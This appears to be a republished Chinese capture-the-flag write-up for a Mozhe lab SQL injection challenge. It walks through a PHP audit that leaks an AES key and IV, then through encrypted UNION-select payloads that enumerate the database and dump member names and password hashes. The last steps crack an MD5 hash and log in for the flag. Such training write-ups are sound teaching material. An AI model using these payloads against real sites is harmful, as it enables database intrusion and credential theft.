SQL注入漏洞测试

Posted 弥天安全实验室

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了SQL注入漏洞测试相关的知识,希望对你有一定的参考价值。

SQL注入漏洞测试

                       --Write Up

题目用到的工具

AES加密网站:

http://tool.chacuo.net/cryptaes

BASE64加密网站:

https://www.sojson.com/base64.html

MD5加密网站:

https://www.cmd5.com/

1.靶场


https://www.mozhe.cn/bug/detail/SjRRVFpOQWlLWDBJd3hzNGY5cFBiQT09bW96aGUmozhe

http://219.153.49.228:49104/,使用御剑扫描得到

SQL注入漏洞测试


http://219.153.49.228:49104/news/

SQL注入漏洞测试


4.下载压缩包,打开代码进行php代码审计。得到的信息如图所示

SQL注入漏洞测试

加密模式为cbc,数据块为128位

第7行:AES的加密长度是128位,秘钥密码为:ydhaqPQnexoaDuW3,偏移量为:2018201920202021。

第8行:数据进行两次base64加密,再进行一次aes加密。

第11行:判断字符串是否存在“_mozhe”所以构造playload的时候先将注入的字符串末尾加上”_mozhe“字符,然后进行AES加密,因为AES默认是进行了一次base64加密,所以AES加密之后只需要进行一次base64加密即可

5.针对题目进行SQL注入操作

SQL注入漏洞测试


6.进行SQL注入操作判断字段数

Payload:1 and 1=2 union select 1,2,3,4,5_mozhe

AES

SQL注入漏洞测试

0hMY7i4yFMb48GTM7O6GEp0IATyHtqb63cXGExm18A1cwdcjbMaDZ+wjDyyQLtGv

Base64

SQL注入漏洞测试


MGhNWTdpNHlGTWI0OEdUTTdPNkdFcDBJQVR5SHRxYjYzY1hHRXhtMThBMWN3ZGNqYk1hRFord2pEeXlRTHRHdg==

参数为4的时候显示正常,5的时候显示错误,说明有4个字段。(后面使用同样的加密方式,图在不截取)

7.进行SQL注入操作判断显示为

Payload:-1 union select 1,2,3,4_mozhe

AES:xgd58ipTrnx8VzS*JicqCo3+zFFzhay5byFU3cjbdeI=

Base64:eGdkNThpcFRybng4VnpTQkppY3FDbzMrekZGemhheTVieUZVM2NqYmRlST0=

 显示为2和3

SQL注入漏洞测试


8.进行SQL注入操作判断当前数据库

Payload:-1 union select 1,database(),3,4_mozhe

AES:xgd58ipTrnx8VzSBJicqCkfa8baY1gC/rbon/boeWRtc5yGs6NJR/uwTC/R61dXI

Base64:eGdkNThpcFRybng4VnpTQkppY3FDa2ZhOGJhWTFnQy9yYm9uL2JvZVdSdGM1eUdzNk5KUi91d1RDL1I2MWRYSQ==

获得数据库

SQL注入漏洞测试


9.进行SQL注入操作爆表

Payload:-1 union select 1,group_concat(table_name),3,4 frominformation_schema.TABLES where TABLE_SCHEMA='mozhe_Discuz_StormGroup' limit0,1_mozhe

AES:xgd58ipTrnx8VzSBJicqCtnxUkLmTyTBAkYq0YotB+2TUlxiaZHz+pFXJJAjk7w7mWa1h8buWVm1L1FnzJByUaKbAWj5+Uvrzr7N78VJwtWqXC3DaqUEdvGNHEt3e3p8sJjsRBKuAUivvxYEe/FJXQ+Ppo/ZQZxYCAcfTSULqO2uPUUua7ymFeOl8Vh0umZM

Base64:eGdkNThpcFRybng4VnpTQkppY3FDdG54VWtMbVR5VEJBa1lxMFlvdEIrMlRVbHhpYVpIeitwRlhKSkFqazd3N21XYTFoOGJ1V1ZtMUwxRm56SkJ5VWFLYkFXajUrVXZyenI3Tjc4Vkp3dFdxWEMzRGFxVUVkdkdOSEV0M2UzcDhzSmpzUkJLdUFVaXZ2eFlFZS9GSlhRK1Bwby9aUVp4WUNBY2ZUU1VMcU8ydVBVVXVhN3ltRmVPbDhWaDB1bVpN

获得数据表

SQL注入漏洞测试


10.进行SQL注入操作爆列

Payload:-1 union select 1,group_concat(column_name),3,4 frominformation_schema.columns where table_name='StormGroup_member' limit 0,1_mozhe

AES:xgd58ipTrnx8VzSBJicqCuvzwQ04ka/PubBNkKJyJETUw/zaWGzAKbj8oM1RQbhWBZatBUkuYe+z+0t8InzKQx67ln0rLohI3CVUkkZVnDk7TeTPx0KV5T85dUqw/YqCs+jTm3PW2rT6JyNPVUvNyLKt/kE3BA14YNBXkcONpiwxBbntstS+bLOJsydl7WHA

Base64:eGdkNThpcFRybng4VnpTQkppY3FDdXZ6d1EwNGthL1B1YkJOa0tKeUpFVFV3L3phV0d6QUtiajhvTTFSUWJoV0JaYXRCVWt1WWUreiswdDhJbnpLUXg2N2xuMHJMb2hJM0NWVWtrWlZuRGs3VGVUUHgwS1Y1VDg1ZFVxdy9ZcUNzK2pUbTNQVzJyVDZKeU5QVlV2TnlMS3Qva0UzQkExNFlOQlhrY09OcGl3eEJibnRzdFMrYkxPSnN5ZGw3V0hB

获得数据表

SQL注入漏洞测试


11.进行SQL注入操作爆字段

Payload:-1 union select 1,group_concat(name,password),3,4 fromStormGroup_member limit 0,1_mozhe

AES:xgd58ipTrnx8VzSBJicqCrKk6D6pYYlFPPQb9jGbVkT6Sq341dUA+jAehyAsFGEMkdGEBx+tcSd01GxR71oQIUtomLjZsBcC+guMwmzo/hT4R/YTgXBUsAADJ25UU/+P

Base64:eGdkNThpcFRybng4VnpTQkppY3FDcktrNkQ2cFlZbEZQUFFiOWpHYlZrVDZTcTM0MWRVQStqQWVoeUFzRkdFTWtkR0VCeCt0Y1NkMDFHeFI3MW9RSVV0b21MalpzQmNDK2d1TXdtem8vaFQ0Ui9ZVGdYQlVzQUFESjI1VVUvK1A=

获得密码MD5值

SQL注入漏洞测试

12.对获得的MD5进行解密19e51305f4926559333371ae20d27517

SQL注入漏洞测试


13.登录后台获取flag

 

菜鸟班门弄斧,大佬勿喷!


以上是关于SQL注入漏洞测试的主要内容,如果未能解决你的问题,请参考以下文章

SQL注入漏洞测试

如何测试我的网站是不是存在基本的 sql 注入漏洞?

sql注入漏洞

appscan发现的sql漏洞 怎么利用

SQL漏洞概述

WEB安全- SQL过滤字符后手工注入漏洞测试(第3题)